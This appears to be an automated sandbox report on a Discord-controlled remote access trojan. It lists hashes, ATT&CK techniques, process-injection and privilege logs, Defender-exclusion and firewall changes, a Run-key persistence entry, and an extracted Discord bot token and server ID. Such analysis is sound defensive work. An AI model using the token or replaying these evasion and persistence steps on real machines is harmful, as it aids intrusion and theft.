discordrat | 5436af4185d5c05d8ec07213f940cb8a3506fa9a0621b45ebf38583e37165977

Analysis

max time kernel
47s
max time network
311s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
30/06/2024, 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Discord rat.exe
Size

79KB
MD5

4a825505953f3f758e1da9bab73df39e
SHA1

ee7226735ea2d358d8628e037f35d38fc799ef50
SHA256

5436af4185d5c05d8ec07213f940cb8a3506fa9a0621b45ebf38583e37165977
SHA512

43120fc749ee67d7b8371aa921ee9a7b3769cbc63db06c0dd5cadfa7a83aeeb51e3a54ac4e8c0738cc58b22bcef0d8c5198b753626955371823d11a54d0d12a9
SSDEEP

1536:UeycDpiiSoH8ovTpPFl+ktd2+6CHpHKcGiNPAeN+cvy1kml4KSYHbC/EuYDbbqik:rycDpiiSoH8ovTpFl+ktd2+6CHpHKcGw

Score

10^/10

discordrat evasion execution persistence privilege_escalation rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTI1Njk1OTk3MzkyMjA1MDA0OA.GGLfYW.bDrMZAIyeTVgyJMSqQFO2gDeB0CtQKGKri6ACU
server_id
1256666099580403734

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Suspicious use of NtCreateUserProcessOtherParentProcess 21 IoCs

description	pid	Process	procid_target
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5
PID 2024 created 576	2024	Discord rat.exe	5

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6740	powershell.exe
6488	powershell.exe
3012	powershell.exe
7748	powershell.exe
4372	powershell.exe
4876	powershell.exe
2808	powershell.exe
5852	powershell.exe
7124	powershell.exe
1424	powershell.exe
800	powershell.exe
6256	powershell.exe
5676	powershell.exe
7004	powershell.exe
4988	powershell.exe
5812	powershell.exe
5480	powershell.exe
3796	powershell.exe
5380	powershell.exe
6152	powershell.exe
6904	powershell.exe
5020	powershell.exe
2516	powershell.exe
5648	powershell.exe
5164	powershell.exe
7096	powershell.exe
8028	powershell.exe
5356	powershell.exe
360	powershell.exe
1940	powershell.exe
5536	powershell.exe
3344	powershell.exe
6568	powershell.exe
6164	powershell.exe
6392	powershell.exe
4372	powershell.exe
6040	powershell.exe
5888	powershell.exe
6032	powershell.exe
1308	powershell.exe
4496	powershell.exe
1316	powershell.exe
6572	powershell.exe
8636	powershell.exe
4596	powershell.exe
4152	powershell.exe
6864	powershell.exe
6200	powershell.exe
4920	powershell.exe
5128	powershell.exe
6464	powershell.exe
2848	powershell.exe
5076	powershell.exe
5648	powershell.exe
2656	powershell.exe
2208	powershell.exe
6560	powershell.exe
1392	powershell.exe
6016	powershell.exe
1424	powershell.exe
6120	powershell.exe
5348	powershell.exe
3096	powershell.exe
5152	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 64 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2100	NetSh.exe
5392	NetSh.exe
216	NetSh.exe
8648	NetSh.exe
5348	NetSh.exe
348	NetSh.exe
1300	NetSh.exe
5760	NetSh.exe
5608	NetSh.exe
6924	NetSh.exe
7836	NetSh.exe
4308	NetSh.exe
4672	NetSh.exe
2332	NetSh.exe
4908	NetSh.exe
5320	NetSh.exe
1176	NetSh.exe
6812	NetSh.exe
5892	NetSh.exe
5280	NetSh.exe
2456	NetSh.exe
8188	NetSh.exe
2492	NetSh.exe
3796	NetSh.exe
6124	NetSh.exe
6496	NetSh.exe
5640	NetSh.exe
8604	NetSh.exe
6044	NetSh.exe
504	NetSh.exe
2912	NetSh.exe
3860	NetSh.exe
68	NetSh.exe
6344	NetSh.exe
5280	NetSh.exe
5704	NetSh.exe
5124	NetSh.exe
5960	NetSh.exe
1068	NetSh.exe
5500	NetSh.exe
4156	NetSh.exe
5732	NetSh.exe
5392	NetSh.exe
4020	NetSh.exe
5856	NetSh.exe
6040	NetSh.exe
4352	NetSh.exe
4176	NetSh.exe
2820	NetSh.exe
6520	NetSh.exe
5012	NetSh.exe
364	NetSh.exe
1504	NetSh.exe
6512	NetSh.exe
5428	NetSh.exe
3236	NetSh.exe
6612	NetSh.exe
8052	NetSh.exe
6468	NetSh.exe
5420	NetSh.exe
4176	NetSh.exe
6764	NetSh.exe
7092	NetSh.exe
6424	NetSh.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Discord rat.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Discord rat.exe"	Discord rat.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
19	discord.com
29	discord.com
31	discord.com
7	discord.com
8	discord.com
12	discord.com
14	discord.com
20	discord.com
21	discord.com

Suspicious use of SetThreadContext 21 IoCs

description	pid	Process	procid_target
PID 2024 set thread context of 1908	2024	Discord rat.exe	73
PID 2024 set thread context of 4716	2024	Discord rat.exe	80
PID 2024 set thread context of 1408	2024	Discord rat.exe	84
PID 2024 set thread context of 2328	2024	Discord rat.exe	91
PID 2024 set thread context of 1324	2024	Discord rat.exe	101
PID 2024 set thread context of 5148	2024	Discord rat.exe	105
PID 2024 set thread context of 5116	2024	Discord rat.exe	115
PID 2024 set thread context of 2076	2024	Discord rat.exe	122
PID 2024 set thread context of 3456	2024	Discord rat.exe	129
PID 2024 set thread context of 6004	2024	Discord rat.exe	136
PID 2024 set thread context of 5416	2024	Discord rat.exe	143
PID 2024 set thread context of 3932	2024	Discord rat.exe	150
PID 2024 set thread context of 4224	2024	Discord rat.exe	157
PID 2024 set thread context of 5580	2024	Discord rat.exe	164
PID 2024 set thread context of 1956	2024	Discord rat.exe	171
PID 2024 set thread context of 5804	2024	Discord rat.exe	178
PID 2024 set thread context of 416	2024	Discord rat.exe	185
PID 2024 set thread context of 4636	2024	Discord rat.exe	192
PID 2024 set thread context of 5496	2024	Discord rat.exe	199
PID 2024 set thread context of 5524	2024	Discord rat.exe	206
PID 2024 set thread context of 3648	2024	Discord rat.exe	213

Event Triggered Execution: Netsh Helper DLL 1 TTPs 63 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\1a\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2024	Discord rat.exe
1908	dllhost.exe
1908	dllhost.exe
1908	dllhost.exe
1908	dllhost.exe
2024	Discord rat.exe
2024	Discord rat.exe
1408	dllhost.exe
1408	dllhost.exe
2024	Discord rat.exe
4716	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
4716	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
1392	powershell.exe
1392	powershell.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
2024	Discord rat.exe
2024	Discord rat.exe
2024	Discord rat.exe
1324	dllhost.exe
1324	dllhost.exe
1392	powershell.exe
2328	dllhost.exe
2328	dllhost.exe
5148	dllhost.exe
5148	dllhost.exe
4920	powershell.exe
4920	powershell.exe
4372	powershell.exe
4372	powershell.exe
5020	powershell.exe
5020	powershell.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
1392	powershell.exe
4372	powershell.exe
2328	dllhost.exe
2328	dllhost.exe
1392	powershell.exe
5356	powershell.exe
5356	powershell.exe
2848	powershell.exe
2848	powershell.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
2328	dllhost.exe
4372	powershell.exe
2848	powershell.exe
5356	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3308	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	1908	dllhost.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	1408	dllhost.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	4716	dllhost.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2328	dllhost.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	1324	dllhost.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	5148	dllhost.exe
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	5356	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	5116	dllhost.exe
Token: SeDebugPrivilege	6016	powershell.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2076	dllhost.exe
Token: SeDebugPrivilege	2516	powershell.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	3456	dllhost.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	6004	dllhost.exe
Token: SeDebugPrivilege	6040	powershell.exe
Token: SeDebugPrivilege	5480	powershell.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	5416	dllhost.exe
Token: SeDebugPrivilege	5128	powershell.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	3932	dllhost.exe
Token: SeDebugPrivilege	360	powershell.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	4224	dllhost.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	5580	dllhost.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	1956	dllhost.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	2024	Discord rat.exe
Token: SeDebugPrivilege	5804	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1908	2024	Discord rat.exe	73
PID 2024 wrote to memory of 1392	2024	Discord rat.exe	74
PID 2024 wrote to memory of 1392	2024	Discord rat.exe	74
PID 2024 wrote to memory of 2908	2024	Discord rat.exe	75
PID 2024 wrote to memory of 2908	2024	Discord rat.exe	75
PID 2024 wrote to memory of 2100	2024	Discord rat.exe	76
PID 2024 wrote to memory of 2100	2024	Discord rat.exe	76
PID 1908 wrote to memory of 576	1908	dllhost.exe	5
PID 1908 wrote to memory of 636	1908	dllhost.exe	7
PID 636 wrote to memory of 2484	636	lsass.exe	44
PID 1908 wrote to memory of 732	1908	dllhost.exe	8
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 636 wrote to memory of 2484	636	lsass.exe	44
PID 2024 wrote to memory of 4716	2024	Discord rat.exe	80
PID 2024 wrote to memory of 4920	2024	Discord rat.exe	81
PID 2024 wrote to memory of 4920	2024	Discord rat.exe	81
PID 2024 wrote to memory of 4952	2024	Discord rat.exe	82
PID 2024 wrote to memory of 4952	2024	Discord rat.exe	82
PID 2024 wrote to memory of 504	2024	Discord rat.exe	83
PID 2024 wrote to memory of 504	2024	Discord rat.exe	83
PID 636 wrote to memory of 2484	636	lsass.exe	44
PID 636 wrote to memory of 2484	636	lsass.exe	44
PID 636 wrote to memory of 2484	636	lsass.exe	44
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 636 wrote to memory of 2484	636	lsass.exe	44
PID 636 wrote to memory of 2484	636	lsass.exe	44
PID 636 wrote to memory of 2484	636	lsass.exe	44
PID 636 wrote to memory of 2484	636	lsass.exe	44
PID 2024 wrote to memory of 1408	2024	Discord rat.exe	84
PID 2024 wrote to memory of 5020	2024	Discord rat.exe	88
PID 2024 wrote to memory of 5020	2024	Discord rat.exe	88
PID 636 wrote to memory of 2484	636	lsass.exe	44
PID 2024 wrote to memory of 3940	2024	Discord rat.exe	89
PID 2024 wrote to memory of 3940	2024	Discord rat.exe	89
PID 2024 wrote to memory of 4308	2024	Discord rat.exe	90
PID 2024 wrote to memory of 4308	2024	Discord rat.exe	90

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:576
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:996
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cd83e5ff-0339-4731-98f3-a07ca30f2650}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1908
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8c8bc1ed-228a-40a3-97df-d7c1cee42846}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4716
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3001719d-0bfb-44fa-9dac-1bf2eaccac73}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8652e0e6-1752-4725-a863-6867d24705cb}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2328
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{04618d90-9743-4828-83ef-ef9289920c51}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1324
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cae0decf-0fde-4cf4-8fde-a55b4367c77a}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5148
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9bd03a52-5ba4-46bd-bfa0-5afefbe24223}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5116
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{21fb2265-b7c9-4505-99ca-0db331d1c239}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3a07d460-054e-4985-a616-5744ef800da5}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3456
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b2b1adf5-8d14-4641-bb1d-cc696d05feb3}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:6004
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d95a3264-2014-4939-b1e5-d71a2d7d8e9b}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5416
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d5723f53-b300-4644-94f6-8a71deab401b}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3932
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{32ecea06-f6e6-41fd-9dcf-8a2acf34b9f0}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4224
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{eac1c300-2754-4b25-bc16-e8a880566eca}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5580
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7824639c-7340-4f18-8637-0e62b5304338}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{338ff857-98eb-4a06-abc3-1142f2fb9c52}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5804
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f10e8ea2-610f-4379-988d-20bb712e1837}
  2⤵
  PID:416
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{84505ea8-207d-4eb6-8575-3bcac22bacf6}
  2⤵
  PID:4636
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8504acac-032a-4471-b547-8349a968ed2c}
  2⤵
  PID:5496
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2d214ba1-c5fc-4eb7-bea5-53062bbfa0a7}
  2⤵
  PID:5524
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d1698fb7-0a24-448b-894b-0386e9d70fa8}
  2⤵
  PID:3648
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{489f2a92-1de5-43cd-ae08-671bd199c6ec}
  2⤵
  PID:4448
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{05ef7cad-0bb5-4a32-a253-1dc0ff2e73cc}
  2⤵
  PID:6088
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b673d9ba-1f15-4694-a0dc-78d58e3a59ee}
  2⤵
  PID:5388
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1cc3181a-96da-4794-b5bf-c90a0cd51500}
  2⤵
  PID:5564
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4c6cdc5e-61f7-44d1-9dff-6ef0fd597309}
  2⤵
  PID:5656
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{884c3a9c-3155-4bd8-9525-84fcd74d4013}
  2⤵
  PID:5252
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ed782aa3-a362-4eec-b3e2-26c17b7e5dcf}
  2⤵
  PID:3792
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{64eff29a-df45-44a3-ad65-80cb07a4461f}
  2⤵
  PID:4568
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{44e34e21-8464-492e-bee3-d94fa55c6e47}
  2⤵
  PID:2548
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c94e5fee-e39d-40c5-9b59-682e531d0eb5}
  2⤵
  PID:2896
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cff9c6da-fa7b-41cd-b0ac-ccd1cf992323}
  2⤵
  PID:216
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9c499441-75c3-432e-851d-a2f57e1d79d6}
  2⤵
  PID:5708
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{de4f6dd1-5af9-424e-8235-d6157f60fd4b}
  2⤵
  PID:5488
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{06198d77-c126-4b07-aae9-6a3fe18e441e}
  2⤵
  PID:2716
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{735b35ad-d775-4da4-8e83-97231744f3c0}
  2⤵
  PID:4440
- C:\Windows\System32\dllhost.exe
